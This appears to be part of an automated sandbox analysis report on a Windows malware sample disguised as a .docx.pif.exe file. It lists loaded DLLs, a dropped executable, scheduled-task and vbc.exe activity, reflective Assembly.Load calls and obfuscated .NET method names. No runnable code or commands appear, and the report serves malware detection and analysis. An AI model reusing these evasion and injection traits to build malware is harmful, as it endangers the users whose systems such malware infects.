                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, YL2q2YAVtmpvhXuwY3.cs.Net Code: sgZHeKVbHo System.Reflection.Assembly.Load(byte[])
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.441f430.2.raw.unpack, YL2q2YAVtmpvhXuwY3.cs.Net Code: sgZHeKVbHo System.Reflection.Assembly.Load(byte[])
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.44d9c50.1.raw.unpack, YL2q2YAVtmpvhXuwY3.cs.Net Code: sgZHeKVbHo System.Reflection.Assembly.Load(byte[])
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.7570000.8.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.7570000.8.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, YL2q2YAVtmpvhXuwY3.cs.Net Code: sgZHeKVbHo System.Reflection.Assembly.Load(byte[])
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041CB50
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_02704659 push edx; retf 0_2_0270465A
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_02704699 push edx; retf 0_2_0270469A
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_0270469B push edx; retf 0_2_0270469E
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_0270469F push edx; retf 0_2_027046A2
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_02704759 push ebp; retf 0_2_0270475A
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_0270475B push ebp; retf 0_2_02704762
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_02704791 push esi; retf 0_2_02704792
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_0270ABE0 pushfd ; retf 0_2_0270ABE2
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_06AE4A9F push C3037447h; ret 0_2_06AE4AC4
                Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exeCode function: 0_2_07568049 push 8BBCEB50h; ret 0_2_0756804F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00457106 push ecx; ret 15_2_00457119
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0045B11A push esp; ret 15_2_0045B141
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_0045E54D push esi; ret 15_2_0045E556
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00457A28 push eax; ret 15_2_00457A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 15_2_00434E56 push ecx; ret 15_2_00434E69
                Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exeStatic PE information: section name: .text entropy: 7.988838794549899
                Source: TkdxROLUOVpK.exe.0.drStatic PE information: section name: .text entropy: 7.988838794549899
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, oxcyjc1LDHjoCrebX9.csHigh entropy of concatenated method names: 'CpeFZUsOAK', 'ffWFT0XXQ8', 'cRvFt9btKt', 'zT9F1vSx30', 'TpJF76fsMy', 'h1bFSO0WEQ', 'vVUFCJYFHA', 'bhhFytBCp0', 'u0kFmVGkif', 'C9MF9meTA7'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, mtvXm3uIEAO1aOMiyD.csHigh entropy of concatenated method names: 'c0milBFjFK', 'hTOiWMHxTV', 'AsPinGlJIO', 'g1uiar8qjC', 'NZxiAZVchj', 'GD0n0QGOqE', 'qIhn4jjovH', 'N9DnGh5vjd', 'HudnjUsN51', 'qHwnBQoRpn'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, wOvN8bjY05qG3h2W8d.csHigh entropy of concatenated method names: 'Sr6ygxiaYx', 'rwfyWo1LHn', 'J3yyFIWqgs', 'prAynrpD0X', 'KMDyiBaq2C', 'skMyasn07F', 'oLiyAycMAm', 'qu2yOwgwf7', 'd5fyxlQnuc', 'KIvyoQ4EBQ'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, YL2q2YAVtmpvhXuwY3.csHigh entropy of concatenated method names: 'nGjdlidUc5', 'BEOdgtBWR3', 'f3EdWwfCY8', 'k00dF4aMpe', 'XCAdnpjDT0', 'mLgdih6Yrv', 'qZrdaV1W46', 'TFDdAmRVJh', 'DsmdOvsiU7', 'xW9dxCCdBM'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, PenYE0tkOYCLDqwRMy.csHigh entropy of concatenated method names: 'OZ2WqovcLY', 'W6EWpoJ0FP', 'YDNWLn2lWn', 'S5DWkwfnRL', 'HxhW098Ls7', 'cd8W4UiHtJ', 'lEnWGZAEua', 'nWyWjpUK0y', 'Lk5WBYBomk', 'faJWv5feyx'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, DWbfV733wDM7SoPHEF6.csHigh entropy of concatenated method names: 'ToString', 'yf59dP2XpZ', 'bUX9H0j1dF', 'v4l9l26UMr', 'qWM9ghK2xI', 'asS9WUxQg4', 'ioo9Frw13P', 'GJF9n3jBEw', 'Ptm8aGGrnB507pBDKR0', 'cCPRQuGGl0M7NqkkF6P'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, qKcUIQWYkr2kHlVcDF.csHigh entropy of concatenated method names: 'Dispose', 'FMN3B1onPs', 'aBvKN0TurG', 'RonttfPa2y', 'xXO3vvN8bY', 'U5q3zG3h2W', 'ProcessDialogKey', 'BdbKYqQ9hF', 'Sg8K35nfpH', 'SYgKKgspkO'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, v0UVJv4Fuk8ZSL2f7F.csHigh entropy of concatenated method names: 'ADTCjxTKwn', 'AxCCvrCUPZ', 'gbiyY7k1ll', 'P8Sy3rvXf6', 'WIqCJCqSkS', 'xg4CIc3Ebq', 'K4JCwhA34c', 'zIOCq3LxMo', 'SybCpGX2uA', 'yQgCLHIsRV'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, ALpl925dRu9MqQXKDu.csHigh entropy of concatenated method names: 'oIwiLLvTPx', 'DPPik0p32Z', 'UBji0ZAewF', 'ToString', 'UVPi4hnMHU', 'cuMiGGoli3', 'TYugPnwIkXNdX6d0qcq', 'iMScspwfwXoIf5qeD4r', 'uRnOqOwmsq7sFZfWfJA', 'jIq298wgC0fl9F1MINd'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, fJAQuF3YIVEeN8MhNPj.csHigh entropy of concatenated method names: 'mVQmVGrnR1', 'SAcmRDBpb4', 'VJHmehkTYa', 'wALmZg41J8', 'l03m8bMRp3', 'TfymTpkQnB', 'eQ5mbW1sDA', 'bAfmtTOLXs', 'JNxm1sSiNM', 'yZRmECQ6Eo'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, icvX8XzjLawXkxgs9u.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jjMmMwHhTW', 'Aqvm7r0f0G', 'gVsmS14DUf', 'ENtmCIbPXV', 'mV7myWetvB', 'HiXmmtg9SP', 'khGm9XRUjO'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, EyMqHCPs9E9FenpsLm.csHigh entropy of concatenated method names: 'xvBagsCXW4', 'J7raFH66Eq', 'kP5aiVR3wa', 'QV9ivkLh0v', 'nTSiz5yecs', 'fNAaYUDGxS', 'IMma3TLuYM', 'SYCaKj6rdg', 'YufadClNQk', 'bh8aHJeSs7'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, sXXw773dDD510lc6jEC.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PGK9qQkYUJ', 'wEg9pijEGS', 'heX9LhSSuN', 'mjg9kJ5mtE', 'pUP90e6fmX', 'wJ794VXkGu', 'ySc9G2eFjM'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, DqQ9hFBLg85nfpHLYg.csHigh entropy of concatenated method names: 'UEKyuBooGO', 'zHfyNtb4tI', 'pKvyQ9sLPA', 'dmiyhubaq7', 'X7qyqZp5UG', 'yoXy6FA4ph', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, xOjHSwE9BsL66jh6xb.csHigh entropy of concatenated method names: 'WhBn8QlguT', 'I6nnbLN2Vn', 'd74FQsRJUf', 'm6rFhsgGx8', 'qCmF67MAsI', 'bGYF5sTXdw', 'upQFP9ndev', 'fOMFrQi4jm', 'gSOF2TIhRs', 'EALFs1EVqK'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, spQoUaHnJ5qLMKORun.csHigh entropy of concatenated method names: 'mcI3aenYE0', 'TOY3ACLDqw', 'xLD3xHjoCr', 'zbX3o9VOjH', 'Wh637xbotv', 'wm33SIEAO1', 'J7x1FueM0GLDd6eQnJ', 'KWGbqQbychIN9Ffyr3', 'wJw33b2NCf', 'z4m3d0066t'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, SiNRcVkQKnvrVZtVoQ.csHigh entropy of concatenated method names: 'wM1CxvY9Hs', 'oDwCoQd8vo', 'ToString', 'pjrCgXAEu3', 'OW5CWIiYmK', 'gAOCFcjJSm', 'VjWCnh6dhi', 'TK4CieaxFB', 'kbMCaJUjQy', 'LHgCAXEZCU'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, xo5PZY2ot5o5nvQbi0.csHigh entropy of concatenated method names: 'eaXaVV6l9r', 'AZmaRmIx87', 'VVwaeXiXiX', 'eudaZIRScA', 'H8va8iWjmv', 'FsyaTgpsXj', 'S5uab8LvLP', 'clSatNDI7e', 'gnka17QghX', 'gNXaEDiCyV'
                Source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.6e30000.7.raw.unpack, RdIWAaqWmQBYJZJocJ.csHigh entropy of concatenated method names: 'v0j7svN4HF', 'dSZ7IY9GTv', 'DYn7qGJLat', 'nBa7phdhlR', 'kwv7NeB87C', 'egY7QhGgvq', 'JwT7h6SR7W', 'BGn76kVla3', 'rba75e67Dn', 'mVO7PCbnyJ'
